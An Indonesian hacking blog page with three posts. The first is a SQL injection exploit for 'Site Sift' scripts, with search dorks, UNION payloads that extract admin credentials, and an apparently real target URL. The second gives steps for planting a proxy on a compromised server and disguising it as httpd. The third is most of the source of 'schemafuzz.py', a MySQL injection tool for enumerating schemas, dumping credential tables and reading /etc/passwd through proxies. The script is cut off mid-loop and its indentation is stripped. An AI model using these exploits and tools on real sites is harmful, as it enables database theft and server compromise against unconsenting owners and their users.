Minggu, 29 Maret 2009

Site Sift scripts SQL Injection

##############################################
# #
# powered by Site Sift scripts SQL Injection #
# #
##############################################


###########################################
#
# DORK 1 : powered by Site Sift
#
# DORK 2 : allinurl: "index php go addpage"
#
# DORK 2 : allinurl: "index.php?go=detail id="
#
###########################################
EXPLOiT 1:

index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/admin/*

EXPLO─░T 2:

index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/from/**/admin/*


ADMiN LOGiN::admin/login.php

note: i hacked sex and porn sites :(( but not changed pass

# milw0rm.com [2008-04-06]


http://www.mjetclub.com/news.php?idnews=%27162

Sabtu, 28 Maret 2009

Cara Buat Proxy pake tool proxy

Cara Buat Proxy pake tool proxy.tgz.

1. Cari tempat yg ada permission 777 ato drwxrwxrwx ato jalan satu² kita upload ada di /tmp, Kalo dah ketemu Upload tool ke dalam injekan itu.

Disini saia coba di folder cache untuk upload tool nya.

2. tar zxvf proxy.tgz

ketik command tar zxvf proxy.tgz di Run command

hasilnya

3. masuk ke folder pro

rubah work directory nya jadi /home/coastal

/public_html/cache/pro ( awalnya /home/coastal/public_html/cache )

4. ./xh -s "/usr/sbin/httpd" ./prox -a -d -p8888

ketik command ./xh -s "/usr/sbin/httpd" ./prox -a -d -p8888 di Run command, 8888 itu adalah port proxy kita

Dah selesai, kita tes aja di channel pake bot biar kita tau proxynya bisa ato ndak.

Ok, Proxy dah selesai selamat brosing aja mana US lage proxynya wkwkwkkww :P~

Coded Phyton ( Schema Fuzz )

#!/usr/bin/python
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ www.v3n0m.net #
################################################################
# MySQL Injection Schema, Dataext, and fuzzer

# Share the c0de!

# Yogyacarderlink Team
# www.v3n0m.com
# ryan@v3n0m.net

# Greetz to
# lingah, LeQhi, IdioT_InsiDe, aRiee, yoga0400, pKi, g0nz, jali-, Anak_Naga, badkiddies, Broken_hack, ulga
# and the yogyacarderlink@Dal.net crew

# NOTES:
# Proxy function may be a little buggy if your using public proxies... Test your proxy prior to using it with this script..
# The script does do a little proxy test.. it does a GET to google.com if data comes back its good... no data = failed and the proxy
# will not be used. This is a effort to keep the script from getting stuck in a endless loop.
# Any other questions Hit the forums and ask questions. google is your friend!

# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# Intended for authorized Web Application Pen Testing!

# BE WARNED, THIS TOOL IS VERY LOUD..

#Set default evasion options here
arg_end = "--"
arg_eva = "+"

#colMax variable for column Finder
colMax = 205
#Fill in the tables you want tested here.
fuzz_tables = ['tbladmins', 'sort', '_wfspro_admin', '4images_users', 'a_admin', 'account', 'accounts', 'adm', 'admin', 'admin_login', 'admin_user', 'admin_userinfo', 'administer', 'administrable', 'administrate', 'administration', 'administrator', 'administrators', 'adminrights', 'admins', 'adminuser', 'art', 'article_admin', 'articles', 'artikel', '\xc3\x83\xc3\x9c\xc3\x82\xc3\xab', 'aut', 'author', 'autore', 'backend', 'backend_users', 'backenduser', 'bbs', 'book', 'chat_config', 'chat_messages', 'chat_users', 'client', 'clients', 'clubconfig', 'company', 'config', 'contact', 'contacts', 'content', 'control', 'cpg_config', 'cpg132_users', 'customer', 'customers', 'customers_basket', 'dbadmins', 'dealer', 'dealers', 'diary', 'download', 'Dragon_users', 'e107.e107_user', 'e107_user', 'forum.ibf_members', 'fusion_user_groups', 'fusion_users', 'group', 'groups', 'ibf_admin_sessions', 'ibf_conf_settings', 'ibf_members', 'ibf_members_converge', 'ibf_sessions', 'icq', 'images', 'index', 'info', 'ipb.ibf_members', 'ipb_sessions', 'joomla_users', 'jos_blastchatc_users', 'jos_comprofiler_members', 'jos_contact_details', 'jos_joomblog_users', 'jos_messages_cfg', 'jos_moschat_users', 'jos_users', 'knews_lostpass', 'korisnici', 'kpro_adminlogs', 'kpro_user', 'links', 'login', 'login_admin', 'login_admins', 'login_user', 'login_users', 'logins', 'logon', 'logs', 'lost_pass', 'lost_passwords', 'lostpass', 'lostpasswords', 'm_admin', 'main', 'mambo_session', 'mambo_users', 'manage', 'manager', 'mb_users', 'member', 'memberlist', 'members', 'minibbtable_users', 'mitglieder', 'movie', 'movies', 'mybb_users', 'mysql', 'mysql.user', 'name', 'names', 'news', 'news_lostpass', 'newsletter', 'nuke_authors', 'nuke_bbconfig', 'nuke_config', 'nuke_popsettings', 'nuke_users', '\xc3\x93\xc3\x83\xc2\xbb\xc2\xa7', 'obb_profiles', 'order', 'orders', 'parol', 'partner', 'partners', 'passes', 'password', 'passwords', 'perdorues', 'perdoruesit', 'phorum_session', 'phorum_user', 'phorum_users', 'phpads_clients', 'phpads_config', 'phpbb_users', 'phpBB2.forum_users', 'phpBB2.phpbb_users', 'phpmyadmin.pma_table_info', 'pma_table_info', 'poll_user', 'punbb_users', 'pwd', 'pwds', 'reg_user', 'reg_users', 'registered', 'reguser', 'regusers', 'session', 'sessions', 'settings', 'shop.cards', 'shop.orders', 'site_login', 'site_logins', 'sitelogin', 'sitelogins', 'sites', 'smallnuke_members', 'smf_members', 'SS_orders', 'statistics', 'superuser', 'sysadmin', 'sysadmins', 'system', 'sysuser', 'sysusers', 'table', 'tables', 'tb_admin', 'tb_administrator', 'tb_login', 'tb_member', 'tb_members', 'tb_user', 'tb_username', 'tb_usernames', 'tb_users', 'tbl', 'tbl_user', 'tbl_users', 'tbluser', 'tbl_clients', 'tbl_client', 'tblclients', 'tblclient', 'test', 'usebb_members', 'user', 'user_admin', 'user_info', 'user_list', 'user_login', 'user_logins', 'user_names', 'usercontrol', 'userinfo', 'userlist', 'userlogins', 'username', 'usernames', 'userrights', 'users', 'vb_user', 'vbulletin_session', 'vbulletin_user', 'voodoo_members', 'webadmin', 'webadmins', 'webmaster', 'webmasters', 'webuser', 'webusers', 'x_admin', 'xar_roles', 'xoops_bannerclient', 'xoops_users', 'yabb_settings', 'yabbse_settings', 'ACT_INFO', 'ActiveDataFeed', 'Category', 'CategoryGroup', 'ChicksPass', 'ClickTrack', 'Country', 'CountryCodes1', 'CustomNav', 'DataFeedPerformance1', 'DataFeedPerformance2', 'DataFeedPerformance2_incoming', 'DataFeedShowtag1', 'DataFeedShowtag2', 'DataFeedShowtag2_incoming', 'dtproperties', 'Event', 'Event_backup', 'Event_Category', 'EventRedirect', 'Events_new', 'Genre', 'JamPass', 'MyTicketek', 'MyTicketekArchive', 'News', 'Passwords by usage count', 'PerfPassword', 'PerfPasswordAllSelected', 'Promotion', 'ProxyDataFeedPerformance', 'ProxyDataFeedShowtag', 'ProxyPriceInfo', 'Region', 'SearchOptions', 'Series', 'Sheldonshows', 'StateList', 'States', 'SubCategory', 'Subjects', 'Survey', 'SurveyAnswer', 'SurveyAnswerOpen', 'SurveyQuestion', 'SurveyRespondent', 'sysconstraints', 'syssegments', 'tblRestrictedPasswords', 'tblRestrictedShows', 'Ticket System Acc Numbers', 'TimeDiff', 'Titles', 'ToPacmail1', 'ToPacmail2', 'Total Members', 'UserPreferences', 'uvw_Category', 'uvw_Pref', 'uvw_Preferences', 'Venue', 'venues', 'VenuesNew', 'X_3945', 'stone list', 'tblArtistCategory', 'tblArtists', 'tblConfigs', 'tblLayouts', 'tblLogBookAuthor', 'tblLogBookEntry', 'tblLogBookImages', 'tblLogBookImport', 'tblLogBookUser', 'tblMails', 'tblNewCategory', 'tblNews', 'tblOrders', 'tblStoneCategory', 'tblStones', 'tblUser', 'tblWishList', 'VIEW1', 'viewLogBookEntry', 'viewStoneArtist', 'vwListAllAvailable', 'CC_info', 'CC_username', 'cms_user', 'cms_users', 'cms_admin', 'cms_admins', 'user_name', 'jos_user', 'table_user', 'email', 'mail', 'bulletin', 'cc_info', 'login_name', 'admuserinfo', 'userlistuser_list', 'SiteLogin', 'Site_Login', 'UserAdmin', 'Admins', 'Login', 'Logins']
#Fill in the columns you want tested here.
fuzz_columns = ['user', 'username', 'password', 'passwd', 'pass', 'cc_number', 'id', 'email', 'emri', 'fjalekalimi', 'pwd', 'user_name', 'customers_email_address', 'customers_password', 'user_password', 'name', 'user_pass', 'admin_user', 'admin_password', 'admin_pass', 'usern', 'user_n', 'users', 'login', 'logins', 'login_user', 'login_admin', 'login_username', 'user_username', 'user_login', 'auid', 'apwd', 'adminid', 'admin_id', 'adminuser', 'adminuserid', 'admin_userid', 'adminusername', 'admin_username', 'adminname', 'admin_name', 'usr', 'usr_n', 'usrname', 'usr_name', 'usrpass', 'usr_pass', 'usrnam', 'nc', 'uid', 'userid', 'user_id', 'myusername', 'mail', 'emni', 'logohu', 'punonjes', 'kpro_user', 'wp_users', 'emniplote', 'perdoruesi', 'perdorimi', 'punetoret', 'logini', 'llogaria', 'fjalekalimin', 'kodi', 'emer', 'ime', 'korisnik', 'korisnici', 'user1', 'administrator', 'administrator_name', 'mem_login', 'login_password', 'login_pass', 'login_passwd', 'login_pwd', 'sifra', 'lozinka', 'psw', 'pass1word', 'pass_word', 'passw', 'pass_w', 'user_passwd', 'userpass', 'userpassword', 'userpwd', 'user_pwd', 'useradmin', 'user_admin', 'mypassword', 'passwrd', 'admin_pwd', 'admin_passwd', 'mem_password', 'memlogin', 'e_mail', 'usrn', 'u_name', 'uname', 'mempassword', 'mem_pass', 'mem_passwd', 'mem_pwd', 'p_word', 'pword', 'p_assword', 'myname', 'my_username', 'my_name', 'my_password', 'my_email', 'cvvnumber ', 'about', 'access', 'accnt', 'accnts', 'account', 'accounts', 'admin', 'adminemail', 'adminlogin', 'adminmail', 'admins', 'aid', 'aim', 'auth', 'authenticate', 'authentication', 'blog', 'cc_expires', 'cc_owner', 'cc_type', 'cfg', 'cid', 'clientname', 'clientpassword', 'clientusername', 'conf', 'config', 'contact', 'converge_pass_hash', 'converge_pass_salt', 'crack', 'customer', 'customers', 'cvvnumber]', 'data', 'db_database_name', 'db_hostname', 'db_password', 'db_username', 'download', 'e-mail', 'emailaddress', 'full', 'gid', 'group', 'group_name', 'hash', 'hashsalt', 'homepage', 'icq', 'icq_number', 'id_group', 'id_member', 'images', 'index', 'ip_address', 'last_ip', 'last_login', 'lastname', 'log', 'login_name', 'login_pw', 'loginkey', 'loginout', 'logo', 'md5hash', 'member', 'member_id', 'member_login_key', 'member_name', 'memberid', 'membername', 'members', 'new', 'news', 'nick', 'number', 'nummer', 'pass_hash', 'passwordsalt', 'passwort', 'personal_key', 'phone', 'privacy', 'pw', 'pwrd', 'salt', 'search', 'secretanswer', 'secretquestion', 'serial', 'session_member_id', 'session_member_login_key', 'sesskey', 'setting', 'sid', 'spacer', 'status', 'store', 'store1', 'store2', 'store3', 'store4', 'table_prefix', 'temp_pass', 'temp_password', 'temppass', 'temppasword', 'text', 'un', 'user_email', 'user_icq', 'user_ip', 'user_level', 'user_passw', 'user_pw', 'user_pword', 'user_pwrd', 'user_un', 'user_uname', 'user_usernm', 'user_usernun', 'user_usrnm', 'userip', 'userlogin', 'usernm', 'userpw', 'usr2', 'usrnm', 'usrs', 'warez', 'xar_name', 'xar_pass']

import urllib, sys, re, os, socket, httplib, urllib2, time, random

#determine platform
if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
SysCls = 'cls'
else:
SysCls = 'unknown'

#say hello
os.system(SysCls)
if len(sys.argv) <= 1:
print "\n|---------------------------------------------------------------|"
print "| v3n0m[at]yogyacarderlink.Dal.net v5.0 |"
print "| 6/2008 schemafuzz.py |"
print "| -MySQL v5+ Information_schema Database Enumeration |"
print "| -MySQL v4+ Data Extractor |"
print "| -MySQL v4+ Table & Column Fuzzer |"
print "| Usage: schemafuzz.py [options] |"
print "| -h help v3n0m.net |"
print "|---------------------------------------------------------------|\n"
sys.exit(1)


#help option
for arg in sys.argv:
if arg == "-h":
print " Usage: ./schemafuzz.py [options] rsauron[@]gmail[dot]com darkc0de.com"
print "\tModes:"
print "\tDefine: --dbs Shows all databases user has access too. MySQL v5+"
print "\tDefine: --schema Enumerate Information_schema Database. MySQL v5+"
print "\tDefine: --full Enumerates all databases information_schema table MySQL v5+"
print "\tDefine: --dump Extract information from a Database, Table and Column. MySQL v4+"
print "\tDefine: --fuzz Fuzz Tables and Columns. MySQL v4+"
print "\tDefine: --findcol Finds Columns length of a SQLi MySQL v4+"
print "\tDefine: --info Gets MySQL server configuration only. MySQL v4+"
print "\n\tRequired:"
print "\tDefine: -u URL \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\""
print "\n\tMode dump and schema options:"
print "\tDefine: -D \"database_name\""
print "\tDefine: -T \"table_name\""
print "\tDefine: -C \"column_name,column_name...\""
print "\n\tOptional:"
print "\tDefine: -p \"127.0.0.1:80 or proxy.txt\""
print "\tDefine: -o \"ouput_file_name.txt\" Default is schemafuzzlog.txt"
print "\tDefine: -r row number to start at"
print "\tDefine: -v Verbosity off option. Will not display row #'s in dump mode."
print "\n Ex: ./schemafuzz.py --info -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\""
print " Ex: ./schemafuzz.py --dbs -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\""
print " Ex: ./schemafuzz.py --schema -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -D catalog -T orders -r 200"
print " Ex: ./schemafuzz.py --dump -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -D joomla -T jos_users -C username,password"
print " Ex: ./schemafuzz.py --fuzz -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -end \"/*\" -o sitelog.txt"
print " Ex: ./schemafuzz.py --findcol -u \"www.site.com/news.php?id=22\""
sys.exit(1)

#define varablies
site = ""
dbt = "schemafuzzlog.txt"
proxy = "None"
count = 0
arg_table = "None"
arg_database = "None"
arg_columns = "None"
arg_row = "Rows"
arg_verbose = 1
darkc0de = "concat(0x1e,0x1e,"
mode = "None"
line_URL = ""
count_URL = ""
gets = 0
cur_db = ""
cur_table = ""
table_num = 0
terminal = ""
num = 0


#Check args
for arg in sys.argv:
if arg == "-u":
site = sys.argv[count+1]
elif arg == "-o":
dbt = sys.argv[count+1]
elif arg == "-p":
proxy = sys.argv[count+1]
elif arg == "--dump":
mode = arg
arg_dump = sys.argv[count]
elif arg == "--full":
mode = arg
elif arg == "--schema":
mode = arg
arg_schema = sys.argv[count]
elif arg == "--dbs":
mode = arg
arg_dbs = sys.argv[count]
elif arg == "--fuzz":
mode = arg
arg_fuzz = sys.argv[count]
elif arg == "--info":
mode = arg
arg_info = sys.argv[count]
elif arg == "--findcol":
mode = arg
arg_findcol = sys.argv[count]
elif arg == "-D":
arg_database = sys.argv[count+1]
elif arg == "-T":
arg_table = sys.argv[count+1]
elif arg == "-C":
arg_columns = sys.argv[count+1]
elif arg == "-end":
arg_end = sys.argv[count+1]
if arg_end == "--":
arg_eva = "+"
else:
arg_eva = "/**/"
elif arg == "-r":
num = sys.argv[count+1]
table_num = num
elif arg == "-v":
arg_verbose = sys.argv[count]
arg_verbose = 0
count+=1

#Title write
file = open(dbt, "a")
print "\n|---------------------------------------------------------------|"
print "| v3n0m[at]yogyacarderlink.Dal.net v5.0 |"
print "| 6/2008 schemafuzz.py |"
print "| -MySQL v5+ Information_schema Database Enumeration |"
print "| -MySQL v4+ Data Extractor |"
print "| -MySQL v4+ Table & Column Fuzzer |"
print "| Usage: schemafuzz.py [options] |"
print "| -h help www.v3n0m.net |"
print "|---------------------------------------------------------------|"
file.write("\n|---------------------------------------------------------------|")
file.write("\n| v3n0m[at]yogyacarderlink.Dal.net v5.0 |")
file.write("\n| 6/2008 schemafuzz.py |")
file.write("\n| -MySQL v5+ Information_schema Database Enumeration |")
file.write("\n| -MySQL v4+ Data Extractor |")
file.write("\n| -MySQL v4+ Table & Column Fuzzer |")
file.write("\n| Usage: schemafuzz.py [options] |")
file.write("\n| -h help www.v3n0m.net |")
file.write("\n|---------------------------------------------------------------|")

#Arg Error Checking
if site == "":
print "\n[-] Must include -u flag and specify a mode."
print "[-] For help -h\n"
sys.exit(1)
if mode == "None":
print "\n[-] Mode must be specified --schema, --dbs, --dump, --fuzz, --info, --full, --findcol."
print "[-] For help -h\n"
sys.exit(1)
if mode == "--schema" and arg_database == "None":
print "[-] Must include -D flag!"
print "[-] For Help -h\n"
sys.exit(1)
if mode == "--dump":
if arg_table == "None" or arg_columns == "None":
print "[-] If MySQL v5+ must include -D, -T and -C flag when --dump specified!"
print "[-] If MySQL v4+ must include -T and -C flag when --dump specified!"
print "[-] For help -h\n"
sys.exit(1)
if mode != "--findcol" and site.find("darkc0de") == -1:
print "\n[-] Site must contain \'darkc0de\'\n"
sys.exit(1)
if proxy != "None":
if len(proxy.split(".")) == 2:
proxy = open(proxy, "r").read()
if proxy.endswith("\n"):
proxy = proxy.rstrip("\n")
proxy = proxy.split("\n")
if arg_columns != "None":
arg_columns = arg_columns.split(",")
if site[:7] != "http://":
site = "http://"+site
if site.endswith("/*"):
site = site.rstrip('/*')
if site.endswith("--"):
site = site.rstrip('--')

#Getting the URL ready with the evasion options we selected
site = site.replace("+",arg_eva)
site = site.replace("/**/",arg_eva)
print "\n[+] URL:",site+arg_end
file.write("\n\n[+] URL:"+site+arg_end+"\n")
print "[+] Evasion Used:","\""+arg_eva+"\" \""+arg_end+"\""
file.write("[+] Evasion Used: \""+str(arg_eva)+"\" \""+str(arg_end)+"\"")
print "[+] %s" % time.strftime("%X")
file.write("\n[+] %s" % time.strftime("%X"))

#Build proxy list
socket.setdefaulttimeout(20)
proxy_list = []
if proxy != "None":
file.write("\n[+] Building Proxy List...")
print "[+] Building Proxy List..."
for p in proxy:
try:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
opener = urllib2.build_opener(proxy_handler)
gets+=1
opener.open("http://www.google.com")
proxy_list.append(urllib2.build_opener(proxy_handler))
file.write("\n\tProxy:"+p+"- Success")
print "\tProxy:",p,"- Success"
except:
file.write("\n\tProxy:"+p+"- Failed")
print "\tProxy:",p,"- Failed"
pass
if len(proxy_list) == 0:
print "[-] All proxies have failed. App Exiting"
sys.exit(1)
print "[+] Proxy List Complete"
file.write("\n[+] Proxy List Complete")
else:
print "[-] Proxy Not Given"
file.write("\n[+] Proxy Not Given")
proxy_list.append(urllib2.build_opener())
proxy_num = 0
proxy_len = len(proxy_list)

#colFinder
if mode == "--findcol":
print "[+] Attempting To find the number of columns..."
file.write("\n[+] Attempting To find the number of columns...")
print "[+] Testing: ",
file.write("\n[+] Testing: ",)
checkfor=[]
sitenew = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva
makepretty = ""
for x in xrange(0,colMax):
try:
sys.stdout.write("%s," % (x))
file.write(str(x)+",")
sys.stdout.flush()
darkc0de = "dark"+str(x)+"c0de"
checkfor.append(darkc0de)
if x > 0:
sitenew += ","
sitenew += "0x"+darkc0de.encode("hex")
finalurl = sitenew+arg_end
gets+=1
proxy_num+=1
source = proxy_list[proxy_num % proxy_len].open(finalurl).read()
for y in checkfor:
colFound = re.findall(y,source)
if len(colFound) >= 1:
print "\n[+] Column Length is:",len(checkfor)
file.write("\n[+] Column Length is: "+str(len(checkfor)))
nullcol = re.findall(("\d+"),y)
print "[+] Found null column at column #:",nullcol[0]
file.write("\n[+] Found null column at column #: "+nullcol[0])
for z in xrange(0,len(checkfor)):
if z > 0:
makepretty += ","
makepretty += str(z)
site = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva+makepretty
print "[+] SQLi URL:",site+arg_end
file.write("\n[+] SQLi URL: "+site+arg_end)
site = site.replace(","+nullcol[0]+",",",darkc0de,")
site = site.replace(arg_eva+nullcol[0]+",",arg_eva+"darkc0de,")
site = site.replace(","+nullcol[0],",darkc0de")
print "[+] darkc0de URL:",site
file.write("\n[+] darkc0de URL: "+site)
print "[-] Done!\n"
file.write("\n[-] Done!\n")
sys.exit(1)
except (KeyboardInterrupt, SystemExit):
raise
except:
pass

print "\n[!] Sorry Column Length could not be found."
file.write("\n[!] Sorry Column Length could not be found.")
print "[-] You might try to change colMax variable or change evasion option.. last but not least do it manually!"
print "[-] Done\n"
sys.exit(1)

#Retireve version:user:database
head_URL = site.replace("darkc0de","concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end
print "[+] Gathering MySQL Server Configuration..."
file.write("\n[+] Gathering MySQL Server Configuration...\n")

while 1:
try:
gets+=1
source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
# Uncomment the following lines to debug issues with gathering server information
# print head_URL
# print source
match = re.findall("\x1e\x1e\S+",source)
if len(match) >= 1:
match = match[0][2:].split("\x1e")
version = match[0]
user = match[1]
database = match[2]
print "\tDatabase:", database
print "\tUser:", user
print "\tVersion:", version
file.write("\tDatabase: "+database+"\n")
file.write("\tUser: "+user+"\n")
file.write("\tVersion: "+version)
version = version[0]
break
else:
print "[-] No Data Found"
sys.exit(1)
except (KeyboardInterrupt, SystemExit):
raise
except:
proxy_num+=1

# Do we have Access to MySQL database and Load_File
if mode == "--info":
head_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+arg_eva+"FROM"+arg_eva+"mysql.user"+arg_end
gets+=1
proxy_num+=1
#print "Debug:",head_URL
source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
match = re.findall("darkc0de",source)
if len(match) >= 1:
yesno = "Yes <-- w00t w00t"
else:
yesno = "No"
print "\n[+] Do we have Access to MySQL Database:",yesno
file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno))
if yesno == "Yes <-- w00t w00t":
print "[!]",site.replace("darkc0de","concat(user,0x3a,password)")+arg_eva+"FROM"+arg_eva+"mysql.user"+arg_end
file.write("\n[!] "+site.replace("darkc0de","concat(user,0x3a,password)")+arg_eva+"FROM"+arg_eva+"mysql.user"+arg_end)
gets+=1
proxy_num+=1
head_URL = site.replace("darkc0de","load_file(0x2f6574632f706173737764)")+arg_end
#print "Debug:",head_URL
source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
match = re.findall("root:x:",source)
match = re.findall("root:*:",source)
if len(match) >= 1:
yesno = "Yes <-- w00t w00t"
else:
yesno = "No"
print "\n[+] Do we have Access to Load_File:",yesno
file.write("\n\n[+] Do we have Access to Load_File: "+str(yesno))
if yesno == "Yes <-- w00t w00t":
print "[!]",site.replace("darkc0de","load_file(0x2f6574632f706173737764)")+arg_end
file.write("\n[!] "+site.replace("darkc0de","load_file(0x2f6574632f706173737764)")+arg_end)

#lets check what we can do based on version
if mode == "--schema" or mode == "--dbs" or mode == "--full":
if int(version) == 4:
print "\n[-] --schema, --dbs and --full can only be used on MySQL v5+ servers!"
print "[-] -h for help"
sys.exit(1)
#Build URLS
if mode == "--schema":
if arg_database != "None" and arg_table == "None":
print "[+] Showing Tables & Columns from database \""+arg_database+"\""
file.write("\n[+] Showing Tables & Columns from database \""+arg_database+"\"")
line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
line_URL += arg_eva+"FROM"+arg_eva+"information_schema.columns"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")
count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(table_schema),0x1e,0x20)")
count_URL += arg_eva+"FROM"+arg_eva+"information_schema.tables"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")+arg_end
arg_row = "Tables"
if arg_database != "None" and arg_table != "None":
print "[+] Showing Columns from Database \""+arg_database+"\" and Table \""+arg_table+"\""
file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"")
line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
line_URL += arg_eva+"FROM"+arg_eva+"information_schema.COLUMNS"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")
line_URL += arg_eva+"AND"+arg_eva+"table_name+=+0x"+arg_table.encode("hex")
count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
count_URL += arg_eva+"FROM"+arg_eva+"information_schema.COLUMNS"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")
count_URL += arg_eva+"AND"+arg_eva+"table_name+=+0x"+arg_table.encode("hex")+arg_end
arg_row = "Columns"
elif mode == "--dump":
print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\""
print "[+] and Column(s) "+str(arg_columns)
file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"")
file.write("\n[+] Column(s) "+str(arg_columns))
for column in arg_columns:
darkc0de += column+",0x1e,"
count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
count_URL += arg_eva+"FROM"+arg_eva+arg_database+"."+arg_table+arg_end
line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")
line_URL += arg_eva+"FROM"+arg_eva+arg_database+"."+arg_table
if int(version) == 4:
count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
count_URL += arg_eva+"FROM"+arg_eva+arg_table+arg_end
line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")
line_URL += arg_eva+"FROM"+arg_eva+arg_table
elif mode == "--full":
print "[+] Starting full SQLi information_schema enumeration..."
line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
line_URL += arg_eva+"FROM"+arg_eva+"information_schema.columns+"+arg_eva+"WHERE"+arg_eva+"table_schema!=0x"+"information_schema".encode("hex")

elif mode == "--dbs":
print "[+] Showing all databases current user has access too!"
file.write("\n[+] Showing all databases current user has access too!")
count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
count_URL += arg_eva+"FROM"+arg_eva+"information_schema.schemata"+arg_eva+"WHERE"+arg_eva+"schema_name!=0x"+"information_schema".encode("hex")+arg_end
line_URL = site.replace("darkc0de","concat(0x1e,0x1e,schema_name,0x1e,0x20)")
line_URL += arg_eva+"FROM"+arg_eva+"information_schema.schemata"+arg_eva+"WHERE"+arg_eva+"schema_name!=0x"+"information_schema".encode("hex")
arg_row = "Databases"
line_URL += arg_eva+"LIMIT"+arg_eva+"NUM,1"+arg_end

#Uncomment the lines below to debug issues with the line_URL or count_URL
#print "URL for Counting rows in column:",count_URL
#print "URL for exploit:",line_URL

#Fuzz table/columns
if mode == "--fuzz":
print "[+] Number of tables names to be fuzzed:",len(fuzz_tables)
file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_tables)))
print "[+] Number of column names to be fuzzed:",len(fuzz_columns)
file.write("\n[+] Number of column names to be fuzzed: "+str(len(fuzz_columns)))
print "[+] Searching for tables and columns..."
file.write("\n[+] Searching for tables and columns...")
fuzz_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+arg_eva+"FROM"+arg_eva+"TABLE"+arg_end
for table in fuzz_tables:
try:
proxy_num+=1
table_URL = fuzz_URL.replace("TABLE",table)
gets+=1
#print "[!] Table Debug:",table_URL
source = proxy_list[proxy_num % proxy_len].open(table_URL).read()
e = re.findall("darkc0de", source)
if len(e) > 0:
print "\n[!] Found a table called:",table
file.write("\n\n[+] Found a table called: "+str(table))
print "\n[+] Now searching for columns inside table \""+table+"\""
file.write("\n\n[+] Now searching for columns inside table \""+str(table)+"\"")
for column in fuzz_columns:
try:
proxy_num+=1
gets+=1
#print "[!] Column Debug:",table_URL.replace("0x6461726b63306465", "concat(0x6461726b63306465,0x3a,"+column+")")
source = proxy_list[proxy_num % proxy_len].open(table_URL.replace("0x6461726b63306465", "concat(0x6461726b63306465,0x3a,"+column+")")).read()
e = re.findall("darkc0de",source)
if len(e) > 0:
print "[!] Found a column called:",column
file.write("\n[!] Found a column called:"+column)
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
print "[-] Done searching inside table \""+table+"\" for columns!"
file.write("\n[-] Done searching inside table \""+str(table)+"\" for columns!")
except (KeyboardInterrupt, SystemExit):
raise
except:
pass

#Lets Count how many rows or columns
if mode == "--schema" or mode == "--dump" or mode == "--dbs":
source = proxy_list[proxy_num % proxy_len].open(count_URL).read()
match = re.findall("\x1e\x1e\S+",source)
match = match[0][2:].split("\x1e")
row_value = match[0]
print "[+] Number of "+arg_row+": "+row_value
file.write("\n[+] Number of "+arg_row+": "+str(row_value)+"\n")
if mode == "--schema" or mode == "--full" or mode == "--dbs":
print
##Schema Enumeration and DataExt loop
if mode == "--schema" or mode == "--dump" or mode == "--dbs":
while int(table_num) != int(row_value)+1:
#print "table#:",table_num,"row#:",row_value
try:
proxy_num+=1
gets+=1
#print line_URL
source = proxy_list[proxy_num % proxy_len].open(line_URL.replace("NUM",str(num))).read()
match = re.findall("\x1e\x1e\S+",source)
if len(match) >= 1:
if mode == "--schema" or mode == "--full":
